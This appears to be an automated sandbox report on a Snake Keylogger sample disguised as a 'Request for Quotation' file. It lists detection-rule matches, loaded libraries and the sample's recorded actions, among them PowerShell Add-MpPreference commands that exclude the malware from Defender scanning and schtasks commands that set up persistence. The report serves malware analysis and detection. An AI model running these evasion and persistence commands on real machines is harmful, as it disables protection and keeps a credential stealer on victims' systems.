                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2113939122.0000000002AAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2112009646.0000000000C2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2118838113.0000000007730000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4515200414.0000000000EF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4514730416.0000000000441000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeBinary or memory string: OriginalFilenamewzxU.exe6 vs Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 14.2.jnqeRRexnD.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe PID: 4408, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: jnqeRRexnD.exe PID: 6448, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: jnqeRRexnD.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3aebce8.2.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.raw.unpack, ----.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, JqK2bvTxFx9IG6SpuA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, JqK2bvTxFx9IG6SpuA.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3d16650.1.raw.unpack, pLOjQct4uuP3G32FB9.csSecurity API names: _0020.AddAccessRule
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.csSecurity API names: _0020.SetAccessControl
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.6f90000.3.raw.unpack, pLOjQct4uuP3G32FB9.csSecurity API names: _0020.AddAccessRule
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@3/3
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeFile created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5452:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4724:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeMutant created: \Sessions\1\BaseNamedObjects\XLczWKrNQSJhyTchb
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5232:120:WilError_03
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmp2F66.tmpJump to behavior
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, 00000009.00000002.4517923303.0000000003065000.00000004.00000800.00020000.00000000.sdmp, jnqeRRexnD.exe, 0000000E.00000002.4517414324.0000000003343000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeReversingLabs: Detection: 34%
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeFile read: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeProcess created: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeProcess created: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
